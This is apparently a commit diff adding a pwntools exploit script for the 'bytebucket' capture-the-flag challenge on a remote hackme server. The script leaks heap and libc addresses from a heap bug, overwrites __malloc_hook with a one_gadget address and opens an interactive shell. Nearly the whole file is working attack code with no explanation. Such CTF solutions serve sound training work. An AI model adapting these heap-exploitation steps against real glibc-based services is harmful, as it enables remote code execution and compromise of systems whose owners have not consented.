|
| 1 | +#!/usr/bin/env python |
| 2 | +# -*- coding: utf-8 -*- |
| 3 | + |
| 4 | +from pwn import * |
| 5 | +from time import sleep |
| 6 | +context.log_level = "critical" |
| 7 | +context.binary = "./bytebucket" |
| 8 | +elf = context.binary |
| 9 | +libc = ELF("./libc-2.23.so.x86_64") |
| 10 | +libc.sym["main_arena"] = 0x3c3b20 |
| 11 | +libc.sym['one_gadget'] = 0xef9f4 |
| 12 | + |
| 13 | +def make_bucket(size, name, slots): |
| 14 | + io.sendlineafter("What to do >> ", "1") |
| 15 | + io.sendlineafter("Size of bucket >> ", str(size)) |
| 16 | + io.sendafter("Name of bucket >> ", name) |
| 17 | + sleep(0.01) |
| 18 | + for slot in slots: |
| 19 | + sz, cont = slot |
| 20 | + io.sendlineafter("Size of content >> ", str(sz)) |
| 21 | + io.sendafter("Content of slot >> ", cont) |
| 22 | + sleep(0.01) |
| 23 | + |
| 24 | +def list_bucket(): |
| 25 | + io.sendlineafter("What to do >> ", "2") |
| 26 | + |
| 27 | +def find_bucket(name): |
| 28 | + io.sendlineafter("What to do >> ", "3") |
| 29 | + io.sendafter("Bucket name to find >> ", name) |
| 30 | + |
| 31 | +def next_bucket(): |
| 32 | + io.sendlineafter("What to do >> ", "4") |
| 33 | + |
| 34 | +def drop_bucket(): |
| 35 | + io.sendlineafter("What to do >> ", "5") |
| 36 | + |
| 37 | +def open_bucket(): |
| 38 | + io.sendlineafter("What to do >> ", "6") |
| 39 | + |
| 40 | +def show_data(): |
| 41 | + io.sendlineafter("What to do >> ", "1") |
| 42 | + |
| 43 | +def edit_data(line, size, cont): |
| 44 | + io.sendlineafter("What to do >> ", "2") |
| 45 | + io.sendlineafter("Which line of data >> ", str(line)) |
| 46 | + io.sendlineafter("Size of new content >> ", str(size)) |
| 47 | + if size: |
| 48 | + io.sendafter("New content >> ", cont) |
| 49 | + sleep(0.01) |
| 50 | + |
| 51 | +def drop_data(line): |
| 52 | + io.sendlineafter("What to do >> ", "3") |
| 53 | + io.sendlineafter("Which line of data >> ", str(line)) |
| 54 | + |
| 55 | +def rename(name): |
| 56 | + io.sendlineafter("What to do >> ", "4") |
| 57 | + io.sendafter("New bucket name >> ", name) |
| 58 | + sleep(0.01) |
| 59 | + |
| 60 | +def close_bucket(): |
| 61 | + io.sendlineafter("What to do >> ", "5") |
| 62 | + |
| 63 | + |
| 64 | +def DEBUG(): |
| 65 | + info("show name @ {:#x}".format(0x15CB)) |
| 66 | + info("edit check @ {:#x}".format(0x10F6)) |
| 67 | + info("edit strlen @ {:#x}".format(0x1117)) |
| 68 | + info("edit realloc @ {:#x}".format(0x1148)) |
| 69 | + info("edit read @ {:#x}".format(0x1180)) |
| 70 | + info("rename @ {:#x}".format(0xEFB)) |
| 71 | + info("find @ {:#x}".format(0x164D)) |
| 72 | + info("free data @ {:#x}".format(0x1217)) |
| 73 | + pause() |
| 74 | + |
| 75 | +# io = process("./bytebucket", env = {"FLAG1": "this_is_the_fucking_flag", "LD_PRELOAD": "./libc-2.23.so.x86_64"}) |
| 76 | +io = remote("hackme.inndy.tw", 7722) |
| 77 | + |
| 78 | +make_bucket(1, '0' * 0x10, [[0x10, "/bin/sh0円"]]) |
| 79 | + |
| 80 | +list_bucket() |
| 81 | +io.recvuntil('0' * 0x10) |
| 82 | +heap = u64(io.recvuntil('";', drop = True).ljust(8, '0円')) - 0x130 |
| 83 | +print("heap @ {:#x}".format(heap)) |
| 84 | +assert heap & 0xfff == 0 |
| 85 | + |
| 86 | +make_bucket(3, '1' * 0x10, [[0x10, 'b' * 0x10], [0x80, 'c' * 0x80], [0x10, 'd' * 0x10]]) |
| 87 | +open_bucket() |
| 88 | +drop_data(1) |
| 89 | +show_data() |
| 90 | + |
| 91 | +edit_data(0, 0xa0, 'x' * 0x20) |
| 92 | +show_data() |
| 93 | +libc.address = u64(io.recvuntil("\x7f")[-6: ] + '0円0円') - 88 - libc.sym["main_arena"] |
| 94 | +print("libc @ {:#x}".format(libc.address)) |
| 95 | +assert libc.address & 0xfff == 0 |
| 96 | + |
| 97 | +edit_data(-14, 0x30, flat(libc.sym["__malloc_hook"] - 0x10)) |
| 98 | +# edit_data(-14, 0x30, flat(libc.sym["__free_hook"] - 0x10)) |
| 99 | +close_bucket() |
| 100 | + |
| 101 | +next_bucket() |
| 102 | +open_bucket() |
| 103 | +# DEBUG() |
| 104 | +rename(flat(libc.sym["one_gadget"])) |
| 105 | +drop_data(-6) |
| 106 | + |
| 107 | +io.interactive() |
0 commit comments